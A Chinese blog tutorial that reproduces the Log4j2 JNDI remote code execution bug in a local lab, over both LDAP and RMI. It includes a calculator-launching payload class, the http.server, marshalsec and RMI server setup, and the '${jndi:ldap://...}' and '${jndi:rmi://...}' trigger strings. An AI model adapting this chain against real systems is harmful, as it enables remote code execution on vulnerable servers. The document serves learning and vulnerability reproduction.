Log4j2高危漏洞复现流程

本文涉及的产品
日志服务 SLS,月写入数据量 50GB 1个月
简介: Log4j2高危漏洞复现流程

背景

 Apache Log4j2是一个基于Java的日志记录工具,该工具重写了Log4j框架,并且引入了大量丰富的特性,Apache log4j-2是Log4j的升级版,这个日志框架被大量用于业务系统开发,用来记录日志信息。在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中,而攻击者则可以利用此特性通过该漏洞构造特殊的数据请求包,最终触发远程代码执行。
 本文章主要是处于个人兴趣想去复现一下 Log4j2的漏洞,事先声明本人对安全领域一窍不通,只是之前碰巧读过部分 Log4j 的代码,所以有兴趣研究下这个问题的根源,当然这篇文章只是告诉大家怎么去复现这个问题。关于 Log4j2部分的源码得等下篇文章了。

image.png


环境介绍

  • 操作系统:macOS Catalina
  • java version "1.8.0_191"
  • LDAP服务端
  • python3.x
  • 手写 RMI 服务端以及测试代码。


LDAP 方式复现

  • 1.手写hack 代码用于启动mac 系统的计算器 java 代码,编译成class 文件。
  • 2.在 class 目录通过 python3 -m http.server 启动服务后能够通过 http 协议访到 hack 的 class 文件。
  • 3.通过marshalsec启动一个 LDAP 服务器,代码开源可以手动各种操作,编译成 jar 包参考LDAP服务端
  • 4.通过 log4j2的打印日志然后访问 hack 代码启动本地计算器。
public class BugFinder {

    public BugFinder() {
        try {
            System.out.println("执行漏洞代码");
            String[] commands = {"open", "/System/Applications/Calculator.app"};
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
            System.out.println("完成执行漏洞代码");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) {
        BugFinder bugFinder = new BugFinder();
    }
}
  • hack 的代码负责启动mac系统的计算器。


python3 -m http.server 8000

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#BugFinder"
  • 在 hack 的class文件所在目录通 python3启动http服务暴露 hack 的 class 文件。
  • 通过marshalsec的开源软件启动 LDAP 服务,参考LDAP服务端


package com.bug;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;


public class BugTester {

    private static final Logger logger = LogManager.getLogger(BugTester.class);

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:ldap://192.168.0.3:1389/BugFinder}");
        try {
            Thread.sleep(1000);
        } catch (Exception e) {

        }
    }
}
  • 通过 log4j2的打印日志${jndi:ldap://192.168.0.3:1389/BugFinder}唤起本地计算器。
  • 不同的 JDK 对于com.sun.jndi.ldap.object.trustURLCodebase的默认值不一样,所以为了测试统一设置成true 便于触发。
  • 不同的 JDK 版本的默认值可能导致这个 bug 不会被触发。


RMI 方式复现

  • 1.手写hack 代码用于启动mac 系统的计算器 java 代码,编译成class 文件。
  • 2.手写 RMI 的服务端代码。
  • 3.通过 log4j2的打印日志然后访问 hack 代码启动本地计算器。
package com.bug;

public class BugFinder {

    public BugFinder() {
        try {
            System.out.println("执行漏洞代码");
            String[] commands = {"open", "/System/Applications/Calculator.app"};
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
            System.out.println("完成执行漏洞代码");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) {
        BugFinder bugFinder = new BugFinder();
    }
}
  • hack 的代码负责启动mac系统的计算器。


package com.bug;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServer {

    public static void main(String[] args) {
        try {
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();
            Reference reference = new Reference("com.bug.BugFinder",
                    "com.bug.BugFinder", null);
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);

            registry.bind("BugFinder", referenceWrapper);

        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
  • RMI 的服务端代码,启动1099端口进行监听。对应 log4j2的日志通过"jndi:rmi://192.168.0.3:1099/BugFinder"进行访问呢。
  • Reference的参数com.bug.BugFinder就是 hack 代码的class 路径。


public class BugTester {

    private static final Logger logger = LogManager.getLogger(BugTester.class);

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:rmi://192.168.0.3:1099/BugFinder}");

        try {
            Thread.sleep(1000);
        } catch (Exception e) {
        }
    }
}
  • 执行 log4j2的 error 日志,参数为${jndi:rmi://192.168.0.3:1099/BugFinder},会触发mac 系统打开计算器。
相关实践学习
日志服务之使用Nginx模式采集日志
本文介绍如何通过日志服务控制台创建Nginx模式的Logtail配置快速采集Nginx日志并进行多维度分析。
目录
相关文章
|
8月前
|
存储 监控 Cloud Native
|
8月前
|
SQL 存储 关系型数据库
redo log 的执行流程?
redo log 的执行流程?
|
安全 Java 开发者
刚折腾完Log4J,又爆Spring RCE核弹级漏洞
继Log4J爆出安全漏洞之后,又在深夜,Spring的github上又更新了一条可能造成RCE(远程命令执行漏洞)的问题代码,随即在国内的安全圈炸开了锅。有安全专家建议升级到JDK 9以上,有些专家又建议回滚到JDK 7以下,一时间小伙伴们不知道该怎么办了。大家来看一段动画演示,怎么改都是“将军"。
128 1
|
7月前
|
存储 监控 Cloud Native
云原生日志处理流程
【6月更文挑战第14天】云原生平台中的日志处理包括9个步骤:收集、ETL、索引、存储、检索、关联、可视化、分析和报告。
|
8月前
|
存储 缓存 关系型数据库
MySQL update执行流程到 redo log深入理解
MySQL update执行流程到 redo log深入理解
93 0
|
安全 Java Shell
Apache Log4j2 远程代码执行漏洞
Apache Log4j2是一个·基于Java的日志记录工具,该工具重写了Log4j框架,并且引入大量丰富的特性,该日志框架被大量用于业务系统开发,用来记录日志信息。
115 2
|
安全 druid Java
【紧急】Apache Log4j任意代码执行漏洞安全风险升级修复教程
近期一个 Apache Log4j 远程代码执行漏洞细节被公开,攻击者利用漏洞可以远程执行代码。经过分析,该组件存在Java JNDI注入漏洞,当程序将用户输入的数据进行日志,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。
379 1
|
安全 Java 大数据
CDH/HDP/CDP等大数据平台中如何快速应对LOG4J的JNDI系列漏洞
CDH/HDP/CDP等大数据平台中如何快速应对LOG4J的JNDI系列漏洞
|
2月前
|
XML 安全 Java
【日志框架整合】Slf4j、Log4j、Log4j2、Logback配置模板
本文介绍了Java日志框架的基本概念和使用方法,重点讨论了SLF4J、Log4j、Logback和Log4j2之间的关系及其性能对比。SLF4J作为一个日志抽象层,允许开发者使用统一的日志接口,而Log4j、Logback和Log4j2则是具体的日志实现框架。Log4j2在性能上优于Logback,推荐在新项目中使用。文章还详细说明了如何在Spring Boot项目中配置Log4j2和Logback,以及如何使用Lombok简化日志记录。最后,提供了一些日志配置的最佳实践,包括滚动日志、统一日志格式和提高日志性能的方法。
429 30
【日志框架整合】Slf4j、Log4j、Log4j2、Logback配置模板
|
22天前
|
监控 安全 Apache
什么是Apache日志?为什么Apache日志分析很重要?
Apache是全球广泛使用的Web服务器软件,支持超过30%的活跃网站。它通过接收和处理HTTP请求,与后端服务器通信,返回响应并记录日志,确保网页请求的快速准确处理。Apache日志分为访问日志和错误日志,对提升用户体验、保障安全及优化性能至关重要。EventLog Analyzer等工具可有效管理和分析这些日志,增强Web服务的安全性和可靠性。